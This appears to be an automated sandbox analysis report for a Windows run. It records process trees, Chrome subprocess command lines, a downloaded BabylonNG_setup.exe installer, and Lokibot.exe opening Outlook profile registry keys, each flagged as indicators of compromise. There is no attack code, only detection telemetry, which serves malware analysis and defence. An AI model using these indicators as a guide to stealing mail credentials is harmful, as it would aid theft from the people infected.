2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 860 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 860 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2884 2736 chrome.exe chrome.exe -
Views/modifies file attributes 1 TTPs 6 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 6036 attrib.exe 6096 attrib.exe 3732 attrib.exe 4672 attrib.exe 5484 attrib.exe 4800 attrib.exe -
outlook_office_path 1 IoCs
Processes:
Lokibot.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Lokibot.exe -
outlook_win_path 1 IoCs
Processes:
Lokibot.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Lokibot.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3760 -s 9562⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Program crash
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
c:\windows\system32\sihost.exesihost.exe1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/channel/UCn2OJocEFxegDrjKZMIfnLw1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff825464f50,0x7ff825464f60,0x7ff825464f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1912 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2300 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1548 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2928 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4128 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4400 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4336 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4732 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4892 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5152 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4960 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3176 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3384 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5084 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3208 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3632 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5616 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3408 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4328 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3184 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4328 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4664 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2600 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3056 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5712 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4252 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5756 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=980 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4916 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3228 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4652 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5980 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5564 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4708 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6232 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3216 /prefetch:82⤵
-
C:\Users\Admin\Downloads\BabylonNG_setup.exe"C:\Users\Admin\Downloads\BabylonNG_setup.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\{40D4E674-BAB0-7891-A712-46E157A567CB}\setup.exe"C:\Users\Admin\AppData\Local\Temp\{40D4E674-BAB0-7891-A712-46E157A567CB}\setup.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\{40D4E~1\IECOOK~1.DLL,UpdateProtectedModeCookieCache affilID|http://babylon-software.com4⤵
- Loads dropped DLL
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4648 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1424 /prefetch:82⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\96.276.200\software_reporter_tool.exe"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\96.276.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=fZSaUCEu784keatWCZZvaGTn9eBU/0cIvEX6GkU8 --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment2⤵
- Executes dropped EXE
-
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\96.276.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\96.276.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=96.276.200 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff7282cf510,0x7ff7282cf520,0x7ff7282cf5303⤵
- Executes dropped EXE
-
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\96.276.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\96.276.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_6760_NSRNLRYVPSUTSWNL" --sandboxed-process-id=2 --init-done-notifier=720 --sandbox-mojo-pipe-token=14105821477355650308 --mojo-platform-channel-handle=696 --engine=23⤵
- Executes dropped EXE
- Loads dropped DLL
-
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\96.276.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\96.276.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_6760_NSRNLRYVPSUTSWNL" --sandboxed-process-id=3 --init-done-notifier=928 --sandbox-mojo-pipe-token=9254977436313870059 --mojo-platform-channel-handle=9243⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:82⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
